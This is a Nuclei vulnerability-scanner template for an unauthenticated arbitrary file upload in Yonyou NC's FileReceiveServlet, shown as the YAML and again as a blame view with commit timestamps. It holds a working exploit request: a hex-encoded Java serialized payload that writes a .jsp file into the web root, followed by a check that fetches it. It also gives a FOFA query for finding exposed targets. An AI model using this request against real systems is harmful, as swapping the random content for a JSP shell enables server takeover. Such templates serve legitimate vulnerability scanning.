nuclei-templates/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-f...

id: yonyou-filereceiveservlet-fileupload

info:
  name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
  author: bjxsec
  severity: critical
  description: |
    An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="用友-UFIDA-NC"
  tags: yonyou,file-upload,intrusive
variables:
  file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
  file_content: "{{randstr}}"

http:
  - raw:
      - |
        POST /servlet/FileReceiveServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;

        {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
      - |
        GET /{{file_name}} HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{file_content}}')"
        condition: and

# digest: 4b0a00483046022100bcdd65a14f3b8e796052630e724be45467f76197107285966d6a7a61f9458843022100f885cd8e13691c8579d864cf24aa7101fdc0fbc2971b636556270d61a131073c:922c64590222798bb761d5b6d8e72950
updated-templates-p 2023-09-17 08:51:38 +00:00			`id: yonyou-filereceiveservlet-fileupload`
Templates - update 2023-09-15 12:23:57 +00:00
			`info:`
			`name: Yonyou NC FileReceiveServlet - Aribitrary File Upload`
			`author: bjxsec`
			`severity: critical`
			`description: \|`
			`An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.`
			`reference:`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
			`fofa-query: app="用友-UFIDA-NC"`
updated templates 2023-09-17 16:11:07 +00:00			`tags: yonyou,file-upload,intrusive`
Templates - update 2023-09-15 12:23:57 +00:00			`variables:`
			`file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"`
			`file_content: "{{randstr}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /servlet/FileReceiveServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data;`

			`{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}`
			`- \|`
			`GET /{{file_name}} HTTP/1.1`
			`Content-Type: application/x-www-form-urlencoded`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code_1 == 200 && status_code_2 == 200"`
			`- "contains(body_2, '{{file_content}}')"`
templateman update 2023-10-14 11:27:55 +00:00			`condition: and`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00
			`# digest: 4b0a00483046022100bcdd65a14f3b8e796052630e724be45467f76197107285966d6a7a61f9458843022100f885cd8e13691c8579d864cf24aa7101fdc0fbc2971b636556270d61a131073c:922c64590222798bb761d5b6d8e72950`